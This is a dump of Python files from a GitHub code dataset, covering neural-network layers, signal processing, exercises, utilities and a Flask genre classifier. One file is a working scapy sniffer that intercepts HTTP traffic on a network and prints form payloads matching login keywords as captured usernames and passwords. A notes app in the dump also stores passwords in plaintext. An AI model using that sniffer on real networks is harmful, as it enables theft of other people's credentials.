tf.Variable(initial_value=sigma_initializer(shape=(self.units,), dtype='float32'),\n trainable=True)\n self.built = True\n\n def call(self, inputs):\n self.kernel = self.weight_mu + self.weight_sigma * self.weights_eps\n self.bias = self.bias_mu + self.bias_sigma * self.bias_eps\n return tf.matmul(inputs, self.kernel) + self.bias\n\n @staticmethod\n def _scale_noise(dim):\n noise = tf.random.normal([dim])\n return tf.sign(noise) * tf.sqrt(tf.abs(noise))\n\n def reset_noise(self, input_shape):\n eps_in = self._scale_noise(input_shape)\n eps_out = self._scale_noise(self.units)\n self.weights_eps = tf.multiply(tf.expand_dims(eps_in, 1), eps_out)\n self.bias_eps = eps_out\n\n def compute_output_shape(self, input_shape):\n assert input_shape and len(input_shape) >= 2\n assert input_shape[-1]\n output_shape = list(input_shape)\n output_shape[-1] = self.units\n return tuple(output_shape)","repo_name":"LANNDS18/DeepAgent_Atari","sub_path":"DeepAgent/networks/noisyNet.py","file_name":"noisyNet.py","file_ext":"py","file_size_in_byte":5367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2240251225","text":"# includes core parts of numpy, matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\n# include scipy's signal processing functions\nimport scipy.signal as signal\n\n# practice reading in complex values stored in a file\n# Read in data that has been stored as raw I/Q interleaved 32-bit float samples\n\ndat = np.fromfile(\"iqsamples.float32\", dtype=\"float32\")\n# Look at the data. Is it complex?\ndat\n\n# Turn the interleaved I and Q samples into complex values\n# the syntax \"dat[0::2]\" means \"every 2nd value in \n# array dat starting from the 0th until the end\"\ndat = dat[0::2] + 1j*dat[1::2]\n\n# Note: a quicker way to turn the interleaved I and Q samples into complex values\n# (courtesy of http://stackoverflow.com/a/5658446/) would be:\n# dat = dat.astype(np.float32).view(np.complex64)\n\n# Now look at the data again. Verify that it is complex:\ndat \n\n# Plot the spectogram of this data\nplt.specgram(dat, NFFT=1024, Fs=1000000)\nplt.title(\"PSD of 'signal' loaded from file\")\nplt.xlabel(\"Time\")\nplt.ylabel(\"Frequency\")\nplt.show() # if you've done this right, you should see a fun surprise here!\n\n# Let's try a PSD plot of the same data\nplt.psd(dat, NFFT=1024, Fs=1000000)\nplt.title(\"PSD of 'signal' loaded from file\")\nplt.show() \n\n\n# And let's look at it on the complex plan\n# Note that showing *every* data point would be time- and processing-intensive\n# so we'll just show a few\nplt.scatter(np.real(dat[0:100000]), np.imag(dat[0:100000]))\nplt.title(\"Constellation of the 'signal' loaded from file\")\nplt.show()\n\nFs = 1000000 # define sampling rate\n\n# Let's try a frequency translation. For a complex signal, \n# frequency translation is achieved with multiplication by a complex exponential\n\n# To mix the data down, generate a complex exponential \n# with phase -f_shift/Fs\nfc = np.exp(-1.0j*2.0*np.pi* 50000/Fs*np.arange(len(dat)))\n# Try plotting this complex exponential with a scatter plot of the complex plan - \n# what do you expect it to look like?\ny = dat * fc\n\n# How has our PSD changed?\n\nplt.psd(dat, NFFT=1024, Fs=1000000, color=\"blue\") # original\nplt.psd(y, NFFT=1024, Fs=1000000, color=\"green\") # translated\nplt.title(\"PSD of 'signal' loaded from file\")\nplt.show() \n\n\n# What happens when you filter your data with a lowpass filter?\nf_bw = 150000\nFs = 1000000\nn_taps = 64 \nlpf = signal.remez(n_taps, [0, f_bw, f_bw+(Fs/2-f_bw)/4, Fs/2], [1,0], Hz=Fs)\n\n# Plot your filter's frequency response:\nw, h = signal.freqz(lpf)\nplt.plot(w, 20 * np.log10(abs(h)))\nplt.xscale('log')\nplt.title('Filter frequency response')\nplt.xlabel('Frequency')\nplt.ylabel('Amplitude')\nplt.margins(0, 0.1)\nplt.grid(which='both', axis='both')\nplt.show()\n\ny = signal.lfilter(lpf, 1.0, dat)\n\n# How has our PSD changed?\n\nplt.psd(dat, NFFT=1024, Fs=1000000, color=\"blue\") # original\nplt.psd(y, NFFT=1024, Fs=1000000, color=\"green\") # filtered\nplt.title(\"PSD of 'signal' loaded from file\")\nplt.show() \n\n# Let's try decimating following a lowpass filter\n\n# Figure out our best decimation rate\ndec_rate = int(Fs / f_bw)\nz = signal.decimate(y, dec_rate)\nFs_z = Fs/dec_rate\n\n# New PSD - now with new Fs\nplt.psd(z, NFFT=1024, Fs=Fs_z, color=\"blue\")\nplt.show()\n\n# Given a signal x (in a numpy array)\ny = x[1:] * np.conj(x[:-1])\nz = np.angle(y)\n\n# The de-emphasis filter\n# Given a signal 'x5' (in a numpy array) with sampling rate Fs_y\nd = Fs_y * 75e-6 # Calculate the # of samples to hit the -3dB point\nx = np.exp(-1/d) # Calculate the decay between each sample\nb = [1-x] # Create the filter coefficients\na = [1,-x]\nx6 = signal.lfilter(b,a,x5)\n\n# Given a signal x (in a numpy array)\nx *= 10000 / np.max(np.abs(x)) # scale so it's audible\nx.astype(\"int16\").tofile(\"wbfm-mono.raw\") # write to file\n\n","repo_name":"wezelball/airspy_ra","sub_path":"airspy_plotiqdata/Lab1/Lab1.py","file_name":"Lab1.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42823484988","text":"import scapy.all as scapy\nfrom scapy.layers.http import HTTPRequest # import HTTP packet\nfrom scapy.layers.inet import IP #import IP altough not necessary.\nfrom colorama import init, Fore\n# initialize colorama\ninit()\n# define colors\nGREEN = Fore.GREEN\nRED = Fore.RED\nBLUE = Fore.BLUE\nRESET = Fore.RESET\n\nclass Sniffer():\n\n def __init__(self):\n self.sniff_packets()\n\n def sniff_packets(self): #main function for sniffing.\n scapy.sniff(prn=self.process_sniffed_packet, store=False) #using scapy.sniff() to sniff the packets, creates a packet by name of packet, prn is callback function to process sniffed packets.\n\n def get_url(self, packet): # to get url from packet\n if packet.haslayer(HTTPRequest):\n url = packet[HTTPRequest].Host + packet[HTTPRequest].Path # combining the Host or domain name with the path.\n return url\n\n def get_ip(self, packet): # to get source IP from packet\n if packet.haslayer(HTTPRequest):\n ip = packet[IP].src\n return ip\n \n def get_method(self, packet): # to get request method from packet.\n if packet.haslayer(HTTPRequest):\n method = packet[HTTPRequest].Method.decode()\n return method\n\n def get_login_info(self, packet): # to get possibly login related info.\n keywords = [\"username\", \"uname\", \"pass\",\"password\",\"login\",\"user\"] #keywords frequently used with login forms.\n if packet.haslayer(HTTPRequest):\n if packet.haslayer(scapy.Raw): # load is usually carried in Raw portion of packets.\n load = str(packet[scapy.Raw].load) \n for keyword in keywords:\n if keyword in load:\n return load\n\n def process_sniffed_packet(self, packet): #callback function mentioned above.\n url = self.get_url(packet)\n login_info = self.get_login_info(packet)\n ip = self.get_ip(packet)\n method = self.get_method(packet)\n\n if url and ip and method:\n print(f\"[+] {RED}{ip}{RESET} Requested {RED}{url}{RESET} with {RED}{method}{RESET}\")\n if url and ip and method == \"POST\":\n print(f\"[+] {RED}{ip}{RESET} Requested {RED}{url}{RESET} with {BLUE}{method}{RESET}\")\n if login_info:\n print(f\"\\n[+] Possible Username/Password {RED}{login_info}{RESET}\\n\")\n \n\nif __name__ == \"__main__\":\n try:\n S = Sniffer()\n except KeyboardInterrupt:\n print(\"[-] Keyboard Interuppted..... EXITING!!\")\n","repo_name":"Prashant-rex/Rudimentry-Linux-Tools","sub_path":"Sniffer/Sniffer.py","file_name":"Sniffer.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"20896170480","text":"\"\"\"qiymatlarni o'zgartirish\"\"\"\ntalaba = {\n \"ism\": \"Nurbek\",\n \"kurs\": \"3-kurs\",\n \"baho\": 5,\n \"yoshi\": 14}\ntalaba[\"millati\"]=\"qozoq\" # millat qo'shish\nprint(talaba)\n\ntalaba[\"ism\"]=\"Nurbek\" #ism o'zgartirish\n\nif talaba[\"yoshi\"]>15: # 15 dan kichik bo'lsa, ...\n print(\"20 dan katta\")\nelse:\n print(\"talaba 20 dan kichik\")\n","repo_name":"Bahrom21/python_lessons","sub_path":"8.07.2021/3-masala 8.07.py","file_name":"3-masala 8.07.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6192520278","text":"# LINK: https://leetcode.com/problems/reverse-linked-list/\n\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n def reverseList(self, head):\n prev = None\n current = head\n\n return current.next\n\n# start with the head element and assign 1-pointer to 2, repeat until last element in the linked list\n# return the linked list\n\n\n\nhead = [1,2,3,4,5]\nprint(reverseList(head))\n","repo_name":"19hhowton/LeetCode","sub_path":"Chapter3_DynamicDataStructures/206. Reverse Linked List.py","file_name":"206. Reverse Linked List.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38756820993","text":"\"\"\"\nProeycto pythom MYSQL\nUn asistente que te permite loguearte/registro\nPermite crear notas, una vez registrado\n\"\"\"\n#importar módulo sqlite\nimport sqlite3\n\n# creación base de datos\nconexion = sqlite3.connect(\"./20-proyecto-python/usuarios.db\")\n\n# Crear tablas de usuario y notas\ntabla_usuario = conexion.cursor()\ntabla_notas = conexion.cursor()\n\ntabla_usuario.execute(\"\"\"CREATE TABLE IF NOT EXISTS usuario (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n nombre varchar(8),\n contraseña varchar(10)\n)\"\"\")\n\ntabla_notas.execute(\"\"\"CREATE TABLE IF NOT EXISTS notas (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n titulo varchar(10),\n contenido varchar(120),\n nombre varchar(8)\n)\"\"\")\n\naccion_usuario = int(input(\"Que acción quieres realizar \\n1.Logueo \\n2.Registro \\n3.Salir \\n\"))\nwhile accion_usuario >=1:\n if accion_usuario == 1:\n # Sistema de logueo del proyecto\n print(\"Logueo\")\n confirmar_usuario = input(\"Introduce tu nombre de usuario: \")\n confirmar_contraseña = input(\"Introduce tu contraseña: \")\n buscar_usuario_registrado = conexion.cursor()\n buscar_usuario_registrado.execute(\"SELECT * from usuario WHERE nombre = ? and contraseña = ?\", (confirmar_usuario, confirmar_contraseña))\n comprobar_usuario = buscar_usuario_registrado.fetchone()\n while comprobar_usuario == None:\n print(\"Usuario no existente\")\n confirmar_usuario = input(\"Introduce de nuevo el usuario: \")\n confirmar_contraseña = input(\"Introduce la contraseña de nuevo: \")\n buscar_usuario_registrado = conexion.cursor()\n buscar_usuario_registrado.execute(\"SELECT * from usuario WHERE nombre = ? and contraseña = ?\", (confirmar_usuario, confirmar_contraseña))\n comprobar_usuario = buscar_usuario_registrado.fetchone()\n \n # Eleccion de la accion a realizar con las notas\n accion_usuario_registro = int(input(\"Que acción quieres realizar \\n1.Crear notas \\n2. Eliminar notas \\n3.Modificar \\n4.Salir \\n\"))\n while accion_usuario_registro >=1:\n # Crear una nota asociada a un usuario específico\n if accion_usuario_registro == 1:\n print(\"Crear\")\n titulo_nota = input(\"Introduce un título para la nota: \")\n contenido_nota = input(\"Contenido de la nota: \")\n crear_nota = conexion.cursor()\n crear_nota.execute(\"INSERT INTO notas VALUES (null,?,?,?)\", (titulo_nota,contenido_nota,confirmar_usuario))\n conexion.commit()\n accion_usuario_registro = int(input(\"Que acción quieres realizar \\n1.Crear notas \\n2. Eliminar notas \\n3.Modificar \\n4.Salir \\n\"))\n\n\n elif accion_usuario_registro == 2:\n print(\"Eliminar\")\n elif accion_usuario_registro == 3:\n print(\"Modificar\")\n else:\n print(\"opcion no valida\")\n\n # Acción de registro finalizada\n elif accion_usuario == 2:\n print(\"Registro\")\n nombre_usuario = input(\"Introduce tu nombre de usuario: \")\n contraseña = input(\"Introduce tu contraseña: \")\n cursor_insert_users = conexion.cursor()\n cursor_insert_users.execute(\"INSERT INTO usuario VALUES (null,?,?)\", (nombre_usuario, contraseña))\n conexion.commit()\n elif accion_usuario == 3:\n print(\"salir\")\n break\n else :\n print(\"Opcion no valida\")\n accion_usuario = int(input(\"introduce una opción válida \\n\"))\n\nconexion.close()\n","repo_name":"IagoFernandezBlanco/Basic_Pyhton_Note_App","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3666,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29177459218","text":"import pandas as pd\r\n\r\npliki = ['C:/Users/ca125/Desktop/Obciążenia_przesunięcia_marzec.xlsx',\r\n 'C:/Users/ca125/Desktop/Obciążenia_przesunięcia_październik.xlsx']\r\nsciezka_docelowa = 'C:/Users/ca125/Desktop/'\r\ncol_P = 'Zapotrzebowanie KSE [MW]'\r\n\r\nfor plik in pliki:\r\n nazwa_pliku = plik.split('/')[-1].split('.')[0] + '_szczyty.xlsx'\r\n writer = pd.ExcelWriter(sciezka_docelowa + nazwa_pliku)\r\n df_wszystkie = pd.read_excel(plik, sheet_name=None, index_col=0)\r\n for nazwa, df in df_wszystkie.items():\r\n tabela = pd.DataFrame()\r\n tabela['Pmax'] = df.groupby(by=df.index.date)[col_P].max()\r\n tabela['Godzina Pmax'] = df.groupby(by=df.index.date)[col_P].idxmax()\r\n mask1 = df.index.hour <= 11\r\n tabela['Pmax 0-11'] = df.loc[mask1].groupby(by=df.loc[mask1].index.date)[col_P].max()\r\n tabela['Godzina Pmax 0-11'] = df.loc[mask1].groupby(by=df.loc[mask1].index.date)[col_P].idxmax()\r\n mask2 = df.index.hour >= 12\r\n tabela['Pmax 12-23'] = df.loc[mask2].groupby(by=df.loc[mask2].index.date)[col_P].max()\r\n tabela['Godzina Pmax 12-23'] = df.loc[mask2].groupby(by=df.loc[mask2].index.date)[col_P].idxmax()\r\n tabela.to_excel(writer, nazwa)\r\n writer.save()\r\n\r\n\r\n","repo_name":"dmrowiec-pl/utils","sub_path":"Szczyty_dobowe_godziny.py","file_name":"Szczyty_dobowe_godziny.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31189229697","text":"# @before-stub-for-debug-begin\nfrom python3problem14 import *\nfrom typing import *\n# @before-stub-for-debug-end\n\n#\n# @lc app=leetcode.cn id=14 lang=python3\n#\n# [14] 最长公共前缀\n#\n\n# @lc code=start\nclass Solution:\n def longestCommonPrefix(self, strs) -> str:\n i = -1\n n = len(strs)\n if n == 0:\n return \"\"\n if n == 1:\n return strs[0]\n flag = True\n try:\n while flag:\n i += 1\n for j in range(1, n):\n if strs[j][i] != strs[j-1][i]:\n flag = False\n break\n # print(i)\n return strs[0][:i]\n except IndexError:\n return strs[0][:i]\n# s = Solution().longestCommonPrefix([\"dog\",\"racecar\",\"car\"])\n# print(s)\n\"\"\"\nAccepted 终于过了,我这个写法算纵向比较,还有横向比较的,可以做到分而治之,之后可以试试\n123/123 cases passed (48 ms)\nYour runtime beats 26.57 % of python3 submissions\nYour memory usage beats 63.42 % of python3 submissions (14.9 MB)\n\"\"\"\n\n# @lc code=end\n\n","repo_name":"Interesting6/FuckLeetCode","sub_path":"14.最长公共前缀.py","file_name":"14.最长公共前缀.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40070388431","text":"\"\"\"Python module which parses and emits TOML.\n\nReleased under the MIT license.\n\"\"\"\n\nfrom . import encoder\nfrom . import decoder\n\n__version__ = \"0.10.1\"\n_spec_ = \"0.5.0\"\n\nload = decoder.load\nloads = decoder.loads\nTomlDecoder = decoder.TomlDecoder\nTomlDecodeError = decoder.TomlDecodeError\nTomlPreserveCommentDecoder = decoder.TomlPreserveCommentDecoder\n\ndump = encoder.dump\ndumps = encoder.dumps\nTomlEncoder = encoder.TomlEncoder\nTomlArraySeparatorEncoder = encoder.TomlArraySeparatorEncoder\nTomlPreserveInlineDictEncoder = encoder.TomlPreserveInlineDictEncoder\nTomlNumpyEncoder = encoder.TomlNumpyEncoder\nTomlPreserveCommentEncoder = encoder.TomlPreserveCommentEncoder\nTomlPathlibEncoder = encoder.TomlPathlibEncoder\n\nfrom collections import OrderedDict\n\nclass TomlOrderedDecoder(TomlDecoder):\n\n def __init__(self):\n super(self.__class__, self).__init__(_dict=OrderedDict)\n\n\nclass TomlOrderedEncoder(TomlEncoder):\n\n def __init__(self):\n super(self.__class__, self).__init__(_dict=OrderedDict)\n\n#print('TOML', __version__, flush=True)","repo_name":"Ghostik2005/Sklad71","sub_path":"sources/backend/toml/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37038567358","text":"#!/usr/bin/env python3\r\n\"\"\"Python. Programowanie funkcyjne\r\n\r\nRozdział 10, zbiór przykładów 2\r\n\"\"\"\r\n# pylint: disable=wrong-import-position\r\n\r\nfrom numbers import Number\r\nfrom functools import total_ordering\r\nfrom typing import NamedTuple\r\n\r\nclass Card1(NamedTuple):\r\n rank: int\r\n suit: str\r\n\r\ntest_card1 = \"\"\"\r\n>>> c2s= Card1(2, '\\u2660')\r\n>>> c2s.rank\r\n2\r\n>>> c2s.suit\r\n'\\u2660'\r\n>>> c2s\r\nCard1(rank=2, suit='♠')\r\n>>> len(c2s)\r\n2\r\n\r\nJest to * nieprawidłowe * zachowanie w grach, w których \r\nranga jest jedynym istotnym atrybutem\r\n\r\n>>> c2h= Card1(2, '\\u2665')\r\n>>> c2h == c2s\r\nFalse\r\n>>> \"{0}== {1}: {2}\".format( c2s, c2h, c2h == c2s )\r\n\"Card1(rank=2, suit='♠')== Card1(rank=2, suit='♥'): False\"\r\n\"\"\"\r\n\r\nfrom typing import Union, Any\r\nCardInt = Union['Card', int]\r\n\r\n@total_ordering\r\nclass Card(tuple):\r\n \"\"\"Obiekt niemutowalny; porównania tylko do rankingu.\r\n \r\n Stara szkoła. \r\n\r\n Suits= '\\u2660', '\\u2665', '\\u2666', '\\u2663'\r\n \"\"\"\r\n __slots__ = ()\r\n def __new__(cls, rank, suit):\r\n obj = super().__new__(Card, (suit, rank))\r\n return obj\r\n def __repr__(self) -> str:\r\n return \"{0.rank}{0.suit}\".format(self)\r\n @property\r\n def rank(self) -> int:\r\n return self[1]\r\n @property\r\n def suit(self) -> str:\r\n return self[0]\r\n def __eq__(self, other: Any) -> bool:\r\n if isinstance(other, Card):\r\n return self.rank == other.rank\r\n elif isinstance(other, int):\r\n return self.rank == other\r\n return NotImplemented\r\n def __lt__(self, other: Any) -> bool:\r\n if isinstance(other, Card):\r\n return self.rank < other.rank\r\n elif isinstance(other, int):\r\n return self.rank < other\r\n return NotImplemented\r\n\r\ntest_eq = \"\"\"\r\n>>> c2s= Card(2, '\\u2660')\r\n>>> c2s.rank\r\n2\r\n>>> c2s.suit\r\n'\\u2660'\r\n>>> c2s\r\n2\\u2660\r\n>>> len(c2s)\r\n2\r\n\r\nTo jest prawidłowe zachowanie w grach, w których\r\nranga jest jedynym istotnym atrybutem\r\n\r\n>>> c2h= Card(2, '\\u2665')\r\n>>> c2h == c2s\r\nTrue\r\n>>> \"{0}== {1}: {2}\".format(c2s, c2h, c2h == c2s)\r\n'2\\u2660== 2\\u2665: True'\r\n>>> c2h == 2\r\nTrue\r\n>>> 2 == c2h\r\nTrue\r\n\"\"\"\r\n\r\ntest_order = \"\"\"\r\n>>> c2s= Card(2, '\\u2660')\r\n>>> c3h= Card(3, '\\u2665')\r\n>>> c4c= Card(4, '\\u2663')\r\n>>> c2s <= c3h < c4c\r\nTrue\r\n>>> c3h >= c3h\r\nTrue\r\n>>> c3h > c2s\r\nTrue\r\n>>> c4c != c2s\r\nTrue\r\n\"\"\"\r\n\r\nextra_comparisons = \"\"\"\r\nTe nie działają, logika nie pasuje do total_ordering.\r\n\r\n>>> c4c= Card(4, '\\u2663')\r\n>>> try:\r\n... print(\"c4c > 3\", c4c > 3)\r\n... except TypeError as e:\r\n... print(e)\r\n'>' not supported between instances of 'Card' and 'int'\r\n>>> try:\r\n... print(\"3 < c4c\", 3 < c4c)\r\n... except TypeError as e:\r\n... print(e)\r\n'<' not supported between instances of 'int' and 'Card'\r\n\"\"\"\r\n\r\n@total_ordering\r\nclass Card2(NamedTuple):\r\n rank: int\r\n suit: str\r\n def __str__(self) -> str:\r\n return \"{0.rank}{0.suit}\".format(self)\r\n def __eq__(self, other: Any) -> bool:\r\n if isinstance(other, Card2):\r\n return self.rank == other.rank\r\n elif isinstance(other, int):\r\n return self.rank == other\r\n return NotImplemented\r\n def __lt__(self, other: Any) -> bool:\r\n if isinstance(other, Card2):\r\n return self.rank < other.rank\r\n elif isinstance(other, int):\r\n return self.rank < other\r\n return NotImplemented\r\n \r\ntest_eq_2 = \"\"\"\r\n>>> c2s = Card2(2, '\\u2660')\r\n>>> c2s.rank\r\n2\r\n>>> c2s.suit\r\n'\\u2660'\r\n>>> c2s\r\nCard2(rank=2, suit='\\u2660')\r\n>>> len(c2s)\r\n2\r\n\r\nTo jest prawidłowe zachowanie w grach, w których\r\nranga jest jedynym istotnym atrybutem\r\n\r\n>>> c2h= Card2(2, '\\u2665')\r\n>>> c2h == c2s\r\nTrue\r\n>>> \"{0} == {1}: {2}\".format(c2s, c2h, c2h == c2s)\r\n'2\\u2660 == 2\\u2665: True'\r\n>>> c2h == 2\r\nTrue\r\n>>> 2 == c2h\r\nTrue\r\n\"\"\"\r\n\r\ntest_order_2 = \"\"\"\r\n>>> c2s= Card2(2, '\\u2660')\r\n>>> c3h= Card2(3, '\\u2665')\r\n>>> c4c= Card2(4, '\\u2663')\r\n>>> c2s <= c3h < c4c\r\nTrue\r\n>>> c3h >= c3h\r\nTrue\r\n>>> c3h > c2s\r\nTrue\r\n>>> c4c != c2s\r\nTrue\r\n\"\"\"\r\n\r\nextra_comparisons_2 = \"\"\"\r\nTe nie działają, logika nie pasuje do total_ordering.\r\n\r\n>>> c4c= Card2(4, '\\u2663')\r\n>>> try:\r\n... print(\"c4c > 3\", c4c > 3)\r\n... except TypeError as e:\r\n... print(e)\r\n'>' not supported between instances of 'Card2' and 'int'\r\n>>> try:\r\n... print(\"3 < c4c\", 3 < c4c)\r\n... except TypeError as e:\r\n... print(e)\r\n'<' not supported between instances of 'int' and 'Card2'\r\n\"\"\"\r\n\r\n__test__ = {\r\n \"test_card1\": test_card1,\r\n \"test_eq\": test_eq,\r\n \"test_order\": test_order,\r\n \"extra_comparisons\": extra_comparisons,\r\n \"test_eq_2\": test_eq_2,\r\n \"test_order_2\": test_order_2,\r\n \"extra_comparisons_2\": extra_comparisons_2,\r\n }\r\n\r\ndef test():\r\n import doctest\r\n doctest.testmod(verbose=1)\r\n\r\nif __name__ == \"__main__\":\r\n test()\r\n","repo_name":"adrian88szymanski/Python_project","sub_path":"Functional Python Programming/Chapter10/ch10_ex2.py","file_name":"ch10_ex2.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43549456897","text":"from operator import add\nfrom math import sin, cos, radians\n\nfrom .convex_stage import convex_hull_inner\n\n\nclass StarStage:\n \"\"\"\n スター型のステージを作るための自作ライブラリ\n \"\"\"\n def __init__(self, width, height) -> None:\n self.width = width\n self.height = height\n self.__stage = [[0 for j in range(self.height)] for i in range(self.width)]\n\n def select(self, x: int, y: int) -> None:\n \"\"\"\n turn to self.__stage[x][y] == 1\n \"\"\"\n self.__stage[x][y] = 1\n\n def draw_circle(self, x: int, y: int, radius: int) -> None:\n \"\"\"\n (x, y) を中心とした半径 radius の円の領域内の値を1にセットする\n \"\"\"\n for i in range(self.width):\n for j in range(self.height):\n if (i - x)**2 + (j - y)**2 <= radius**2:\n self.select(i, j)\n\n def draw_rect(self, x: int, y: int, offset: float, width: float, height: float, degree: float):\n \"\"\"\n (x, y)を起点とし、そこから(r, θ) = (offset, degree)離れた場所を\n 最近接辺の中心とする幅width, 高さheightの長方形を作る\n \"\"\"\n\n rad = radians(degree)\n midpoint = (x + offset * cos(rad), y + offset * sin(rad))\n vertex = [\n tuple(map(add, midpoint, (width * sin(rad) / 2, -width * cos(rad) / 2))),\n tuple(map(add, midpoint, (-width * sin(rad) / 2, width * cos(rad) / 2))),\n tuple(map(add, midpoint, (-width * sin(rad) / 2 + height * cos(rad), width * cos(rad) / 2 + height * sin(rad)))),\n tuple(map(add, midpoint, (width * sin(rad) / 2 + height * cos(rad), -width * cos(rad) / 2 + height * sin(rad)))),\n ]\n # 整数化とタプル化\n vertex = tuple([tuple(map(round, v)) for v in vertex])\n # vertexを反時計回りに並べ替える\n inner_point = convex_hull_inner(vertex)\n for i, j in inner_point:\n self.select(i, j)\n\n def __str__(self):\n print(\"cells are indexed by [x][y]\")\n return \"\\n\".join(map(str, self.__stage))\n\n @property\n def stage_region(self):\n \"\"\"\n エージェント・誘因力の存在可能部分のみ1にマスクされた\n 二次元配列を返す\n\n return: self.__stage (list[int][int])\n \"\"\"\n return self.__stage\n","repo_name":"PastaSoba/Wu-s_physarum","sub_path":"wu_physarum/lib/star_stage.py","file_name":"star_stage.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1177036795","text":"from flask import Flask, render_template\nimport pickle\nimport numpy as np\nfrom keras.models import load_model\nimport h5py\nimport sys\nimport librosa\nimport random\nimport math\napp = Flask(__name__)\n\n\nprd_model = load_model('models/RNN_model.hdf5')\nprd_model2 = load_model('models/RNN_bolly_model1.hdf5')\nprint(\"MODEL INSTANCE HERE\", file=sys.stderr)\nprint(prd_model, file=sys.stderr)\n\ngenres = np.array(['blues', 'classical', 'country', 'disco', 'hiphop', 'jazz',\n 'metal', 'pop', 'reggae', 'rock'])\ngenres2 = np.array(['bollypop', 'carnatic', 'ghazal', 'semiclassical', 'sufi'])\n\n\ndef predict(model, X, genres):\n print(\"INSIDE PREDICTION\", file=sys.stderr)\n print(X, file=sys.stderr)\n X = X[np.newaxis, ...]\n prediction = model.predict(X)\n predicted_index = np.argmax(prediction, axis=1)\n print(\"Outcome Index: {}\".format(predicted_index))\n print(\"Outcome genre: {}\".format(genres[predicted_index]))\n return genres[predicted_index]\n\n\ndef save(genres, prd_model, path, n_mfcc=13, n_fft=2048, hop_length=512, num_segments=5):\n\n sample_rate = 22050\n duration = 30\n samples_per_track = sample_rate * duration\n data = {\n\n \"mfcc\": [],\n\n }\n\n num_samples_per_segment = int(samples_per_track/num_segments)\n expected_mfccv_per_segments = math.ceil(num_samples_per_segment/hop_length)\n signal, sr = librosa.load(path, sr=sample_rate)\n\n for s in range(num_segments):\n\n start = num_samples_per_segment * s\n finish = start + num_samples_per_segment\n mfcc = librosa.feature.mfcc(\n signal[start:finish], sr=sr, n_fft=n_fft, n_mfcc=n_mfcc, hop_length=hop_length)\n mfcc = mfcc.T\n if len(mfcc) == expected_mfccv_per_segments:\n data[\"mfcc\"].append(mfcc.tolist())\n print(\"{}, segment:{}\".format(path, s))\n\n genre = predict(prd_model, np.array(data[\"mfcc\"])[1], genres)\n\n return genre\n\n\n@app.route(\"/\")\ndef home():\n\n musicmap = [\"clsong.wav\",\n \"cosong.wav\", \"hsong.wav\", \"msong.wav\", \"song1.wav\", \"song2.wav\", \"song3.wav\"]\n musicmap2 = [\"bsong.wav\",\n \"susong.wav\", \"semsong.wav\", \"msong.wav\", \"ghsong.wav\", \"carsong.wav\"]\n\n print(musicmap)\n pictureList = [\"https://i1.wp.com/cornellsun.com/wp-content/uploads/2019/09/a3825990458_10.jpg?w=1200\", \"https://substreammagazine.com/wp-content/uploads/2020/07/Valley-2020-scaled.jpg\", \"https://i.pinimg.com/originals/42/c4/1e/42c41e228d7bc5cf4496f787fdc2b23b.jpg\",\n \"https://images-na.ssl-images-amazon.com/images/I/513VUhBNJzL.jpg\", \"https://images-na.ssl-images-amazon.com/images/I/513VUhBNJzL.jpg\", \"https://www.gratefulweb.com/sites/default/files/images/articles/DSC_5675.jpg\", \"https://66.media.tumblr.com/18f3a10f6cd8cb849138f77d8a3f09a1/tumblr_inline_ptzcmmfz8B1s9on4d_540.jpg\"]\n\n pictureList2 = [\"https://rollingstoneindia.com/wp-content/uploads/2018/05/1-RSCover-MAY-18-lower-res-480x628.jpg\",\n \"https://static.toiimg.com/thumb/msid-63414571,width-800,height-600,resizemode-75,imgsize-25766/63414571.jpg\",\n \"https://upload.wikimedia.org/wikipedia/commons/a/a0/Prateek_Kuhad_New.jpg\",\n \"https://englishtribuneimages.blob.core.windows.net/gallary-content/2020/7/2020_7$largeimg_741540610.jpg\",\n \"https://static.toiimg.com/photo/78868526/78868526.jpg?v=3\",\n \"https://rollingstoneindia.com/wp-content/uploads/2020/09/Armaan-3-960x1243.jpg\"]\n return render_template(\"index.html\", musicmaps=zip(musicmap, pictureList), musicmaps2=zip(musicmap2, pictureList2))\n\n\n@app.route(\"/\")\ndef mus(name):\n path = f\"static/music/{name}\"\n genre = save(genres, prd_model, path, num_segments=5)\n print(\"The Value Of Genre Is: {}\".format(genre), file=sys.stderr)\n return render_template(\"home.html\", music=name, genre=genre[0].title())\n\n\n@app.route(\"/hindi/\")\ndef hmus(name):\n path = f\"static/music/{name}\"\n genre = save(genres2, prd_model2, path, num_segments=5)\n print(\"The Value NAME IS: {}\".format(name), file=sys.stderr)\n return render_template(\"home2.html\", music=name, genre=genre[0].title())\n\n\nif __name__ == \"__main__\":\n 